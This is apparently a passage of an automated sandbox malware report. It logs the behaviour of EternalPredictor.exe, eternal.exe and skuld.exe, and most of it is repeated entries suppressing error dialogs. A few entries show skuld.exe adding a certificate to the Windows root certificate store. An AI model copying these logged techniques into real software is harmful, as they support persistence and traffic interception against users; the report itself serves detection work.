etLastError,GetProcAddress,GetLastError,5_2_00007FF72C6576C0
                        Source: C:\Users\user\AppData\Roaming\skuld.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
